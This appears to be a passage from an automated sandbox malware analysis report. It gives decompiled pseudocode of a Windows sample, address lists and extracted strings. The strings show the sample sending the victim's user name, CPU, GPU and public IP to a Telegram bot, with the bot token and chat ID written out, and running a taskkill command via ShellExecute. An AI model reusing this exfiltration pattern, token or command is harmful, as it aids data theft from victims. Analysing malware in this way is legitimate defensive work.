				if (_t464 - 0x10 >= 0) goto 0xe4c4f4a0;
				asm("inc ecx");
				asm("movups [esp+0x70], xmm0");
				 *((long long*)(_t435 - 0x78)) = 0xf;
				goto 0xe4c4f516;
				_t432 =  >  ? 0xffffffff : _t464 | 0x0000000f;
				_t353 = _t432 + 1;
				if (_t353 - 0x1000 < 0) goto 0xe4c4f4f1;
				_t294 = _t353 + 0x27;
				if (_t294 - _t353 <= 0) goto 0xe4c4f698;
				_t354 = _t294;
				E00007FF67FF6E4C623D8(_t294, _t354);
				if (_t294 == 0) goto 0xe4c4f6a4;
				_t142 = _t294 + 0x27; // 0x27
				 *((long long*)((_t142 & 0xffffffe0) - 8)) = _t294;
				goto 0xe4c4f4fe;
				if (_t354 == 0) goto 0xe4c4f4fe;
				E00007FF67FF6E4C623D8(_t294, _t354);
				 *((long long*)(_t438 + 0x70)) = _t294;
				_t405 =  >=  ? _t316 : _t435 + 0x70;
				E00007FF67FF6E4C64380();
				 *((long long*)(_t435 - 0x78)) = _t432;
				 *(_t435 - 0x80) = _t464;
				 *((long long*)(_t435 + 0x40)) = _t438 + 0x70;
				E00007FF67FF6E4C49E00(_t438 + 0x70, _t316, _t435 + 0x20, _t438 + 0x70, _t432);
				_t192 = E00007FF67FF6E4C4DD20(_t196, _t316, _t435 - 0x20, _t438 + 0x70); // executed
				_t408 =  *((intOrPtr*)(_t435 - 8));
				if (_t408 - 0x10 < 0) goto 0xe4c4f57b;
				if (_t408 + 1 - 0x1000 < 0) goto 0xe4c4f575;
				if ( *((intOrPtr*)(_t435 - 0x20)) -  *((intOrPtr*)( *((intOrPtr*)(_t435 - 0x20)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c4f69e;
				0xe4c623d0();
				_t411 =  *((intOrPtr*)(_t435 - 0x78));
				if (_t411 - 0x10 < 0) goto 0xe4c4f5b7;
				if (_t411 + 1 - 0x1000 < 0) goto 0xe4c4f5b2;
				if ( *((intOrPtr*)(_t438 + 0x70)) -  *((intOrPtr*)( *((intOrPtr*)(_t438 + 0x70)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c4f6a4;
				0xe4c623d0();
				0xe4c623d0();
				0xe4c623d0();
				if (r12b == 0) goto 0xe4c4f601;
				if (_t460 + 1 - 0x1000 < 0) goto 0xe4c4f5f8;
				if (_t316 -  *((intOrPtr*)(_t316 - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c4f6aa;
				0xe4c623d0();
				_t416 =  *((intOrPtr*)(_t435 + 0x60));
				if (_t416 - 0x10 < 0) goto 0xe4c4f638;
				if (_t416 + 1 - 0x1000 < 0) goto 0xe4c4f633;
				if ( *((intOrPtr*)(_t435 + 0x48)) -  *((intOrPtr*)( *((intOrPtr*)(_t435 + 0x48)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c4f668;
				0xe4c623d0();
				return E00007FF67FF6E4C623B0(_t192, _t195,  *(_t435 + 0x3d0) ^ _t438);
			}















































                                                                                                                                                              0x7ff6e4c4eeb0
                                                                                                                                                              0x7ff6e4c4eeb0
                                                                                                                                                              0x7ff6e4c4eeb0
                                                                                                                                                              0x7ff6e4c4eeb5
                                                                                                                                                              0x7ff6e4c4eeba
                                                                                                                                                              0x7ff6e4c4eec8
                                                                                                                                                              0x7ff6e4c4eed0
                                                                                                                                                              0x7ff6e4c4eed7
                                                                                                                                                              0x7ff6e4c4eede
                                                                                                                                                              0x7ff6e4c4eee1
                                                                                                                                                              0x7ff6e4c4eef1
                                                                                                                                                              0x7ff6e4c4eef5
                                                                                                                                                              0x7ff6e4c4ef02
                                                                                                                                                              0x7ff6e4c4ef05
                                                                                                                                                              0x7ff6e4c4ef0c
                                                                                                                                                              0x7ff6e4c4ef10
                                                                                                                                                              0x7ff6e4c4ef14
                                                                                                                                                              0x7ff6e4c4ef1c
                                                                                                                                                              0x7ff6e4c4ef2b
                                                                                                                                                              0x7ff6e4c4ef3b
                                                                                                                                                              0x7ff6e4c4ef41
                                                                                                                                                              0x7ff6e4c4ef44
                                                                                                                                                              0x7ff6e4c4ef49
                                                                                                                                                              0x7ff6e4c4ef51
                                                                                                                                                              0x7ff6e4c4ef60
                                                                                                                                                              0x7ff6e4c4ef63
                                                                                                                                                              0x7ff6e4c4ef67
                                                                                                                                                              0x7ff6e4c4ef6b
                                                                                                                                                              0x7ff6e4c4ef6f
                                                                                                                                                              0x7ff6e4c4ef78
                                                                                                                                                              0x7ff6e4c4ef7a
                                                                                                                                                              0x7ff6e4c4ef85
                                                                                                                                                              0x7ff6e4c4ef87
                                                                                                                                                              0x7ff6e4c4ef8b
                                                                                                                                                              0x7ff6e4c4ef8f
                                                                                                                                                              0x7ff6e4c4ef93
                                                                                                                                                              0x7ff6e4c4ef9e
                                                                                                                                                              0x7ff6e4c4efa0
                                                                                                                                                              0x7ff6e4c4efa5
                                                                                                                                                              0x7ff6e4c4efa9
                                                                                                                                                              0x7ff6e4c4efb2
                                                                                                                                                              0x7ff6e4c4efb4
                                                                                                                                                              0x7ff6e4c4efb9
                                                                                                                                                              0x7ff6e4c4efc0
                                                                                                                                                              0x7ff6e4c4efc9
                                                                                                                                                              0x7ff6e4c4efcb
                                                                                                                                                              0x7ff6e4c4efd0
                                                                                                                                                              0x7ff6e4c4efd7
                                                                                                                                                              0x7ff6e4c4efdd
                                                                                                                                                              0x7ff6e4c4efe6
                                                                                                                                                              0x7ff6e4c4eff5
                                                                                                                                                              0x7ff6e4c4effa
                                                                                                                                                              0x7ff6e4c4f00c
                                                                                                                                                              0x7ff6e4c4f014
                                                                                                                                                              0x7ff6e4c4f01a
                                                                                                                                                              0x7ff6e4c4f026
                                                                                                                                                              0x7ff6e4c4f02b
                                                                                                                                                              0x7ff6e4c4f030
                                                                                                                                                              0x7ff6e4c4f035
                                                                                                                                                              0x7ff6e4c4f03a
                                                                                                                                                              0x7ff6e4c4f056
                                                                                                                                                              0x7ff6e4c4f05a
                                                                                                                                                              0x7ff6e4c4f05d
                                                                                                                                                              0x7ff6e4c4f060
                                                                                                                                                              0x7ff6e4c4f062
                                                                                                                                                              0x7ff6e4c4f064
                                                                                                                                                              0x7ff6e4c4f067
                                                                                                                                                              0x7ff6e4c4f06f
                                                                                                                                                              0x7ff6e4c4f08a
                                                                                                                                                              0x7ff6e4c4f098
                                                                                                                                                              0x7ff6e4c4f09d
                                                                                                                                                              0x7ff6e4c4f09f
                                                                                                                                                              0x7ff6e4c4f0a4
                                                                                                                                                              0x7ff6e4c4f0a8
                                                                                                                                                              0x7ff6e4c4f0b0
                                                                                                                                                              0x7ff6e4c4f0b5
                                                                                                                                                              0x7ff6e4c4f0b9
                                                                                                                                                              0x7ff6e4c4f0bd
                                                                                                                                                              0x7ff6e4c4f0c5
                                                                                                                                                              0x7ff6e4c4f0c9
                                                                                                                                                              0x7ff6e4c4f0da
                                                                                                                                                              0x7ff6e4c4f0e0
                                                                                                                                                              0x7ff6e4c4f0e5
                                                                                                                                                              0x7ff6e4c4f0ea
                                                                                                                                                              0x7ff6e4c4f0f3
                                                                                                                                                              0x7ff6e4c4f0f8
                                                                                                                                                              0x7ff6e4c4f10a
                                                                                                                                                              0x7ff6e4c4f110
                                                                                                                                                              0x7ff6e4c4f120
                                                                                                                                                              0x7ff6e4c4f126
                                                                                                                                                              0x7ff6e4c4f130
                                                                                                                                                              0x7ff6e4c4f136
                                                                                                                                                              0x7ff6e4c4f144
                                                                                                                                                              0x7ff6e4c4f154
                                                                                                                                                              0x7ff6e4c4f15d
                                                                                                                                                              0x7ff6e4c4f162
                                                                                                                                                              0x7ff6e4c4f167
                                                                                                                                                              0x7ff6e4c4f16f
                                                                                                                                                              0x7ff6e4c4f17e
                                                                                                                                                              0x7ff6e4c4f18c
                                                                                                                                                              0x7ff6e4c4f1a2
                                                                                                                                                              0x7ff6e4c4f1a7
                                                                                                                                                              0x7ff6e4c4f1ac
                                                                                                                                                              0x7ff6e4c4f1ae
                                                                                                                                                              0x7ff6e4c4f1b3
                                                                                                                                                              0x7ff6e4c4f1b8
                                                                                                                                                              0x7ff6e4c4f1bb
                                                                                                                                                              0x7ff6e4c4f1c6
                                                                                                                                                              0x7ff6e4c4f1cb
                                                                                                                                                              0x7ff6e4c4f1cf
                                                                                                                                                              0x7ff6e4c4f1d3
                                                                                                                                                              0x7ff6e4c4f1d7
                                                                                                                                                              0x7ff6e4c4f1da
                                                                                                                                                              0x7ff6e4c4f1de
                                                                                                                                                              0x7ff6e4c4f1e2
                                                                                                                                                              0x7ff6e4c4f1e6
                                                                                                                                                              0x7ff6e4c4f1ea
                                                                                                                                                              0x7ff6e4c4f1f2
                                                                                                                                                              0x7ff6e4c4f1f5
                                                                                                                                                              0x7ff6e4c4f206
                                                                                                                                                              0x7ff6e4c4f20b
                                                                                                                                                              0x7ff6e4c4f20e
                                                                                                                                                              0x7ff6e4c4f212
                                                                                                                                                              0x7ff6e4c4f216
                                                                                                                                                              0x7ff6e4c4f21a
                                                                                                                                                              0x7ff6e4c4f21e
                                                                                                                                                              0x7ff6e4c4f226
                                                                                                                                                              0x7ff6e4c4f235
                                                                                                                                                              0x7ff6e4c4f23a
                                                                                                                                                              0x7ff6e4c4f23b
                                                                                                                                                              0x7ff6e4c4f24c
                                                                                                                                                              0x7ff6e4c4f251
                                                                                                                                                              0x7ff6e4c4f254
                                                                                                                                                              0x7ff6e4c4f258
                                                                                                                                                              0x7ff6e4c4f25c
                                                                                                                                                              0x7ff6e4c4f260
                                                                                                                                                              0x7ff6e4c4f264
                                                                                                                                                              0x7ff6e4c4f26c
                                                                                                                                                              0x7ff6e4c4f27c
                                                                                                                                                              0x7ff6e4c4f282
                                                                                                                                                              0x7ff6e4c4f28a
                                                                                                                                                              0x7ff6e4c4f29d
                                                                                                                                                              0x7ff6e4c4f2b2
                                                                                                                                                              0x7ff6e4c4f2b8
                                                                                                                                                              0x7ff6e4c4f2be
                                                                                                                                                              0x7ff6e4c4f2c6
                                                                                                                                                              0x7ff6e4c4f2d9
                                                                                                                                                              0x7ff6e4c4f2ee
                                                                                                                                                              0x7ff6e4c4f2f4
                                                                                                                                                              0x7ff6e4c4f2f9
                                                                                                                                                              0x7ff6e4c4f2fd
                                                                                                                                                              0x7ff6e4c4f305
                                                                                                                                                              0x7ff6e4c4f309
                                                                                                                                                              0x7ff6e4c4f311
                                                                                                                                                              0x7ff6e4c4f324
                                                                                                                                                              0x7ff6e4c4f339
                                                                                                                                                              0x7ff6e4c4f33f
                                                                                                                                                              0x7ff6e4c4f345
                                                                                                                                                              0x7ff6e4c4f34d
                                                                                                                                                              0x7ff6e4c4f360
                                                                                                                                                              0x7ff6e4c4f375
                                                                                                                                                              0x7ff6e4c4f37b
                                                                                                                                                              0x7ff6e4c4f380
                                                                                                                                                              0x7ff6e4c4f384
                                                                                                                                                              0x7ff6e4c4f38c
                                                                                                                                                              0x7ff6e4c4f390
                                                                                                                                                              0x7ff6e4c4f399
                                                                                                                                                              0x7ff6e4c4f3ad
                                                                                                                                                              0x7ff6e4c4f3c2
                                                                                                                                                              0x7ff6e4c4f3c8
                                                                                                                                                              0x7ff6e4c4f3cd
                                                                                                                                                              0x7ff6e4c4f3d2
                                                                                                                                                              0x7ff6e4c4f3db
                                                                                                                                                              0x7ff6e4c4f3e0
                                                                                                                                                              0x7ff6e4c4f3e8
                                                                                                                                                              0x7ff6e4c4f3fb
                                                                                                                                                              0x7ff6e4c4f410
                                                                                                                                                              0x7ff6e4c4f416
                                                                                                                                                              0x7ff6e4c4f41c
                                                                                                                                                              0x7ff6e4c4f424
                                                                                                                                                              0x7ff6e4c4f438
                                                                                                                                                              0x7ff6e4c4f44d
                                                                                                                                                              0x7ff6e4c4f453
                                                                                                                                                              0x7ff6e4c4f458
                                                                                                                                                              0x7ff6e4c4f45d
                                                                                                                                                              0x7ff6e4c4f461
                                                                                                                                                              0x7ff6e4c4f469
                                                                                                                                                              0x7ff6e4c4f474
                                                                                                                                                              0x7ff6e4c4f478
                                                                                                                                                              0x7ff6e4c4f47c
                                                                                                                                                              0x7ff6e4c4f480
                                                                                                                                                              0x7ff6e4c4f48b
                                                                                                                                                              0x7ff6e4c4f48d
                                                                                                                                                              0x7ff6e4c4f491
                                                                                                                                                              0x7ff6e4c4f496
                                                                                                                                                              0x7ff6e4c4f49e
                                                                                                                                                              0x7ff6e4c4f4b4
                                                                                                                                                              0x7ff6e4c4f4b8
                                                                                                                                                              0x7ff6e4c4f4c3
                                                                                                                                                              0x7ff6e4c4f4c5
                                                                                                                                                              0x7ff6e4c4f4cc
                                                                                                                                                              0x7ff6e4c4f4d2
                                                                                                                                                              0x7ff6e4c4f4d5
                                                                                                                                                              0x7ff6e4c4f4dd
                                                                                                                                                              0x7ff6e4c4f4e3
                                                                                                                                                              0x7ff6e4c4f4eb
                                                                                                                                                              0x7ff6e4c4f4ef
                                                                                                                                                              0x7ff6e4c4f4f4
                                                                                                                                                              0x7ff6e4c4f4f6
                                                                                                                                                              0x7ff6e4c4f4fe
                                                                                                                                                              0x7ff6e4c4f507
                                                                                                                                                              0x7ff6e4c4f50d
                                                                                                                                                              0x7ff6e4c4f512
                                                                                                                                                              0x7ff6e4c4f516
                                                                                                                                                              0x7ff6e4c4f51f
                                                                                                                                                              0x7ff6e4c4f52c
                                                                                                                                                              0x7ff6e4c4f53a
                                                                                                                                                              0x7ff6e4c4f53f
                                                                                                                                                              0x7ff6e4c4f547
                                                                                                                                                              0x7ff6e4c4f55a
                                                                                                                                                              0x7ff6e4c4f56f
                                                                                                                                                              0x7ff6e4c4f575
                                                                                                                                                              0x7ff6e4c4f57b
                                                                                                                                                              0x7ff6e4c4f583
                                                                                                                                                              0x7ff6e4c4f597
                                                                                                                                                              0x7ff6e4c4f5ac
                                                                                                                                                              0x7ff6e4c4f5b2
                                                                                                                                                              0x7ff6e4c4f5bb
                                                                                                                                                              0x7ff6e4c4f5c4
                                                                                                                                                              0x7ff6e4c4f5cd
                                                                                                                                                              0x7ff6e4c4f5dd
                                                                                                                                                              0x7ff6e4c4f5f2
                                                                                                                                                              0x7ff6e4c4f5fb
                                                                                                                                                              0x7ff6e4c4f601
                                                                                                                                                              0x7ff6e4c4f609
                                                                                                                                                              0x7ff6e4c4f61c
                                                                                                                                                              0x7ff6e4c4f631
                                                                                                                                                              0x7ff6e4c4f633
                                                                                                                                                              0x7ff6e4c4f667

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn$Initialize$ComputerConcurrency::cancel_current_taskCreateInstanceInternetNameOpenSecuritylstrcpy
                                                                                                                                                              • String ID: %0A$&text=$/sendMessage?chat_id=$1327052997$5468819057:AAHRJabfvGnrMiNkuZj9RaE8-OjfRBxOw-4$New User: %ws%sCPU: %s%sGPU: %s%sIP: %s$https://api.ipify.org/$https://api.telegram.org/bot
                                                                                                                                                              • API String ID: 1521715204-179090217
                                                                                                                                                              • Opcode ID: 242ed6d6c2a2d949a94529f68ebcf1f305167fcdd2962083c4150b8f1896575d
                                                                                                                                                              • Instruction ID: a64d32fb106f95956173cc66c5b358b65ae2ad5eef85dadb9e352c5b44a2864c
                                                                                                                                                              • Opcode Fuzzy Hash: 242ed6d6c2a2d949a94529f68ebcf1f305167fcdd2962083c4150b8f1896575d
                                                                                                                                                              • Instruction Fuzzy Hash: 8D22B127A58A8385FB009F78D5843AD63B1FB48BE4F505232DA6D83AD9DF79D081C306
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C44750 Relevance: 35.5, APIs: 14, Strings: 6, Instructions: 487COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 445 7ff6e4c44750-7ff6e4c44841 call 7ff6e4c62cc0 call 7ff6e4c64a30 call 7ff6e4c4b740 call 7ff6e4c4ab00 call 7ff6e4c49520 456 7ff6e4c44875-7ff6e4c44891 445->456 457 7ff6e4c44843-7ff6e4c44855 445->457 458 7ff6e4c448c5-7ff6e4c44947 call 7ff6e4c4a9a0 call 7ff6e4c4b100 456->458 459 7ff6e4c44893-7ff6e4c448a5 456->459 460 7ff6e4c44857-7ff6e4c4486a 457->460 461 7ff6e4c44870 call 7ff6e4c623d0 457->461 482 7ff6e4c44949-7ff6e4c44952 458->482 483 7ff6e4c44965-7ff6e4c44982 call 7ff6e4c4d2d0 call 7ff6e4c4a730 458->483 464 7ff6e4c448a7-7ff6e4c448ba 459->464 465 7ff6e4c448c0 call 7ff6e4c623d0 459->465 460->461 462 7ff6e4c44f1b-7ff6e4c44f20 call 7ff6e4c6a5f8 460->462 461->456 468 7ff6e4c44f21-7ff6e4c44f26 call 7ff6e4c6a5f8 462->468 464->465 464->468 465->458 475 7ff6e4c44f27-7ff6e4c44f2c call 7ff6e4c6a5f8 468->475 480 7ff6e4c44f2d-7ff6e4c44f32 call 7ff6e4c6a5f8 475->480 487 7ff6e4c44f33-7ff6e4c44f38 call 7ff6e4c6a5f8 480->487 482->483 491 7ff6e4c44954-7ff6e4c4495f 482->491 496 7ff6e4c449b0-7ff6e4c44a50 call 7ff6e4c4a9a0 call 7ff6e4c4ab00 * 2 483->496 497 7ff6e4c44984-7ff6e4c449ab call 7ff6e4c42b00 483->497 495 7ff6e4c44f39-7ff6e4c44f3e call 7ff6e4c6a5f8 487->495 491->483 503 7ff6e4c44f3f-7ff6e4c44f44 call 7ff6e4c6a5f8 495->503 511 7ff6e4c44a66-7ff6e4c44a72 496->511 512 7ff6e4c44a52-7ff6e4c44a62 call 7ff6e4c4c130 496->512 497->496 510 7ff6e4c44f45-7ff6e4c44f4a call 7ff6e4c6a5f8 503->510 515 7ff6e4c44aba-7ff6e4c44b10 call 7ff6e4c4b740 call 7ff6e4c4ab00 511->515 516 7ff6e4c44a74-7ff6e4c44a7b 511->516 512->511 528 7ff6e4c44b44-7ff6e4c44c03 call 7ff6e4c4ab00 call 7ff6e4c64a30 MultiByteToWideChar call 7ff6e4c4b740 call 7ff6e4c4ab00 515->528 529 7ff6e4c44b12-7ff6e4c44b24 515->529 519 7ff6e4c44a7d-7ff6e4c44a9d 516->519 520 7ff6e4c44a9f-7ff6e4c44aa3 call 7ff6e4c4c2a0 516->520 522 7ff6e4c44aa8-7ff6e4c44aae 519->522 520->522 522->515 526 7ff6e4c44ab0-7ff6e4c44ab8 522->526 526->516 541 7ff6e4c44c37-7ff6e4c44cd2 call 7ff6e4c64a30 MultiByteToWideChar call 7ff6e4c69a50 SleepEx ShellExecuteW 528->541 542 7ff6e4c44c05-7ff6e4c44c17 528->542 530 7ff6e4c44b26-7ff6e4c44b39 529->530 531 7ff6e4c44b3f call 7ff6e4c623d0 529->531 530->475 530->531 531->528 550 7ff6e4c44d05-7ff6e4c44d1d 541->550 551 7ff6e4c44cd4-7ff6e4c44ce5 541->551 543 7ff6e4c44c19-7ff6e4c44c2c 542->543 544 7ff6e4c44c32 call 7ff6e4c623d0 542->544 543->480 543->544 544->541 554 7ff6e4c44d50-7ff6e4c44d68 550->554 555 7ff6e4c44d1f-7ff6e4c44d30 550->555 552 7ff6e4c44ce7-7ff6e4c44cfa 551->552 553 7ff6e4c44d00 call 7ff6e4c623d0 551->553 552->487 552->553 553->550 556 7ff6e4c44d6a-7ff6e4c44d80 554->556 557 7ff6e4c44da0-7ff6e4c44db9 554->557 559 7ff6e4c44d4b call 7ff6e4c623d0 555->559 560 7ff6e4c44d32-7ff6e4c44d45 555->560 562 7ff6e4c44d9b call 7ff6e4c623d0 556->562 563 7ff6e4c44d82-7ff6e4c44d95 556->563 564 7ff6e4c44dec-7ff6e4c44e04 557->564 565 7ff6e4c44dbb-7ff6e4c44dcc 557->565 559->554 560->495 560->559 562->557 563->503 563->562 569 7ff6e4c44e38-7ff6e4c44ea6 call 7ff6e4c49470 call 7ff6e4c61494 564->569 570 7ff6e4c44e06-7ff6e4c44e17 564->570 567 7ff6e4c44de7 call 7ff6e4c623d0 565->567 568 7ff6e4c44dce-7ff6e4c44de1 565->568 567->564 568->510 568->567 584 7ff6e4c44ea8-7ff6e4c44eb5 569->584 585 7ff6e4c44ed4-7ff6e4c44f0e call 7ff6e4c623b0 569->585 573 7ff6e4c44e19-7ff6e4c44e2c 570->573 574 7ff6e4c44e32-7ff6e4c44e37 call 7ff6e4c623d0 570->574 573->574 576 7ff6e4c44f0f-7ff6e4c44f14 call 7ff6e4c6a5f8 573->576 574->569 583 7ff6e4c44f15-7ff6e4c44f1a call 7ff6e4c6a5f8 576->583 583->462 587 7ff6e4c44eb7-7ff6e4c44eca 584->587 588 7ff6e4c44ecf call 7ff6e4c623d0 584->588 587->583 591 7ff6e4c44ecc 587->591 588->585 591->588
                                                                                                                                                              C-Code - Quality: 29%
                                                                                                                                                              			E00007FF67FF6E4C44750(void* __rax, long long __rbx, long long __rcx, signed long long __rdi, long long __rsi) {
				void* __rbp;
				void* __r15;
				void* _t218;
				signed char _t226;
				void* _t241;
				void* _t245;
				void* _t252;
				signed char _t254;
				void* _t255;
				void* _t256;
				intOrPtr* _t267;
				signed long long _t308;
				signed long long _t309;
				intOrPtr* _t321;
				intOrPtr* _t322;
				intOrPtr _t323;
				char* _t328;
				char* _t329;
				signed long long _t333;
				signed long long _t334;
				char* _t366;
				intOrPtr* _t382;
				intOrPtr* _t386;
				signed long long _t397;
				signed long long _t442;
				intOrPtr _t445;
				void* _t455;
				intOrPtr _t460;
				void* _t464;
				signed long long _t468;
				intOrPtr _t475;
				signed long long _t478;
				signed long long _t481;
				intOrPtr _t484;
				intOrPtr _t487;
				intOrPtr _t492;
				intOrPtr* _t495;
				void* _t498;
				char* _t501;
				void* _t503;
				char* _t504;
				signed long long _t506;
				void* _t508;
				long long _t512;
				void* _t518;
				void* _t521;
				void* _t524;
				void* _t527;
				void* _t529;
				signed long long _t530;
				void* _t532;

				_t495 = __rdi;
				_t363 = __rbx;
				 *((long long*)(_t506 + 0x10)) = __rbx;
				 *((long long*)(_t506 + 0x18)) = __rsi;
				 *(_t506 + 0x20) = __rdi;
				_t504 = _t506 - 0x1140;
				 *0x1E54AE80000126B =  *((intOrPtr*)(0x1e54ae80000126b)) + _t255;
				asm("loopne 0x4a");
				_t308 =  *0xe4ca90a0 ^ _t506;
				 *(_t504 + 0x1130) = _t308;
				_t501 = __rcx;
				 *((long long*)(_t506 + 0x78)) = __rcx;
				r8d = 0x110;
				E00007FF67FF6E4C64A30(_t218, _t256, _t504 + 0x20, 0, _t508);
				_t509 = __rcx;
				E00007FF67FF6E4C4B740(__rbx, _t506 + 0x58, 0, __rdi, _t504, __rcx);
				_t309 = _t308;
				r8d = 9;
				E00007FF67FF6E4C4AB00(_t363, _t309, _t501, _t509, _t532);
				r14d = 0;
				 *(_t506 + 0x38) = _t530;
				 *(_t506 + 0x48) = _t530;
				 *(_t506 + 0x50) = _t530;
				asm("movups xmm0, [eax]");
				asm("movups [esp+0x38], xmm0");
				asm("movups xmm1, [eax+0x10]");
				asm("movups [esp+0x48], xmm1");
				 *(_t309 + 0x10) = _t530;
				 *((long long*)(_t309 + 0x18)) = 0xf;
				 *_t309 = r14b;
				_t440 =  >=  ?  *(_t506 + 0x38) : _t506 + 0x38;
				E00007FF67FF6E4C49520(_t363, _t504 + 0x20,  >=  ?  *(_t506 + 0x38) : _t506 + 0x38); // executed
				 *((long long*)(_t504 +  *((intOrPtr*)( *((intOrPtr*)(_t504 + 0x20)) + 4)) + 0x20)) = 0xe4c89bc0;
				 *((long long*)(_t504 +  *((intOrPtr*)( *((intOrPtr*)(_t504 + 0x20)) + 4)) + 0x1c)) =  *((intOrPtr*)( *((intOrPtr*)(_t504 + 0x20)) + 4)) - 0xb0;
				_t442 =  *(_t506 + 0x50);
				if (_t442 - 0x10 < 0) goto 0xe4c44875;
				if (_t442 + 1 - 0x1000 < 0) goto 0xe4c44870;
				if ( *(_t506 + 0x38) -  *((intOrPtr*)( *(_t506 + 0x38) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c44f1b;
				0xe4c623d0();
				 *(_t506 + 0x48) = _t530;
				 *(_t506 + 0x50) = 0xf;
				 *(_t506 + 0x38) = 0;
				_t445 =  *((intOrPtr*)(_t506 + 0x70));
				if (_t445 - 0x10 < 0) goto 0xe4c448c5;
				if (_t445 + 1 - 0x1000 < 0) goto 0xe4c448c0;
				if ( *((intOrPtr*)(_t506 + 0x58)) -  *((intOrPtr*)( *((intOrPtr*)(_t506 + 0x58)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c44f21;
				0xe4c623d0();
				 *(_t506 + 0x68) = _t530;
				 *((long long*)(_t506 + 0x70)) = 0xf;
				 *((char*)(_t506 + 0x58)) = 0;
				 *((char*)(_t506 + 0x30)) = 0;
				 *(_t504 - 0x40) = _t530;
				 *(_t504 - 0x30) = _t530;
				 *((long long*)(_t504 - 0x28)) = 0xf;
				 *(_t504 - 0x40) = 0;
				r8d = 1;
				E00007FF67FF6E4C4A9A0(_t504 - 0x40, _t506 + 0x30, _t509);
				_t382 =  *((intOrPtr*)( *((intOrPtr*)(_t504 +  *((intOrPtr*)( *((intOrPtr*)(_t504 + 0x20)) + 4)) + 0x60)) + 8));
				 *((long long*)(_t506 + 0x40)) = _t382;
				_t321 =  *_t382;
				 *((intOrPtr*)(_t321 + 8))();
				_t322 = _t321;
				E00007FF67FF6E4C4B100(_t363, _t506 + 0x38, _t501);
				_t226 =  *((long long*)( *((intOrPtr*)( *_t322 + 0x40))))();
				_t386 =  *((intOrPtr*)(_t506 + 0x40));
				if (_t386 == 0) goto 0xe4c44965;
				 *((intOrPtr*)( *_t386 + 0x10))();
				if (_t322 == 0) goto 0xe4c44965;
				 *_t322();
				r8d = _t254 & 0x000000ff;
				E00007FF67FF6E4C4D2D0(_t226 & 0x000000ff, _t504 + 0x20, _t504 - 0x40, _t501, _t530); // executed
				E00007FF67FF6E4C4A730(0xa, _t226 & 0x000000ff, _t504 + 0x30, _t501, _t524, _t503);
				_t267 = _t322;
				if (_t267 != 0) goto 0xe4c449b0;
				_t323 =  *((intOrPtr*)(_t504 + 0x20));
				 *((intOrPtr*)(_t323 - 0x7d)) =  *((intOrPtr*)(_t323 - 0x7d)) + _t255;
				if (_t267 >= 0) goto 0xe4c449e9;
				 *_t495 =  *_t495 + _t255;
				asm("inc ebp");
				asm("adc [ebp+0x33], al");
				asm("loope 0x1");
				 *((long long*)( *((intOrPtr*)(_t323 + 4)) + _t504 + 0x20 + 0x75 + ( *((intOrPtr*)(_t323 + 4)) + _t504 + 0x20) * 4)) =  *((long long*)( *((intOrPtr*)(_t323 + 4)) + _t504 + 0x20 + 0x75 + ( *((intOrPtr*)(_t323 + 4)) + _t504 + 0x20) * 4)) - 1;
				asm("sldt word [eax]");
				sil = sil +  *0xb075894c;
				E00007FF67FF6E4C4A9A0(_t504 - 0x60, "/K taskkill /IM ",  *((intOrPtr*)( *_t322)));
				_t455 =  >=  ?  *(_t504 - 0x40) : _t504 - 0x40;
				_t512 =  *(_t504 - 0x30);
				E00007FF67FF6E4C4AB00(_t226 & 0x000000ff, _t504 - 0x60, _t501, _t512,  *((intOrPtr*)(_t323 + 4)) + _t504 + 0x20);
				r8d = 0xb;
				E00007FF67FF6E4C4AB00(_t226 & 0x000000ff, _t504 - 0x60, _t501, _t512);
				_t497 =  >=  ?  *((void*)(_t504 - 0x60)) : _t504 - 0x60;
				_t498 = ( >=  ?  *((void*)(_t504 - 0x60)) : _t504 - 0x60) +  *(_t504 - 0x50);
				_t366 =  >=  ?  *((void*)(_t504 - 0x60)) : _t504 - 0x60;
				 *(_t504 - 0x80) = _t530;
				 *(_t504 - 0x70) = _t530;
				r8d = 7;
				 *((long long*)(_t504 - 0x68)) = _t512;
				 *(_t504 - 0x80) = r14w;
				if (_t498 - _t366 - 8 < 0) goto 0xe4c44a66;
				E00007FF67FF6E4C4C130(_t504 - 0x80, _t498 - _t366, _t498, _t504, 0xe4c89bc0);
				_t397 = _t530;
				 *(_t504 - 0x70) = _t397;
				 *(_t506 + 0x38) = _t504 - 0x80;
				if (_t366 == _t498) goto 0xe4c44aba;
				r9d =  *_t366;
				if (_t397 -  *((intOrPtr*)(_t504 - 0x68)) >= 0) goto 0xe4c44a9f;
				_t100 = _t397 + 1; // 0x1
				 *(_t504 - 0x70) = _t100;
				_t328 =  >=  ?  *(_t504 - 0x80) : _t504 - 0x80;
				 *((intOrPtr*)(_t328 + _t397 * 2)) = r9w;
				 *(_t328 + 2 + _t397 * 2) = r14w;
				goto 0xe4c44aa8;
				E00007FF67FF6E4C4C2A0(_t504 - 0x80, _t498, _t504, _t529, 0xe4c89bc0);
				if (_t366 + 1 == _t498) goto 0xe4c44aba;
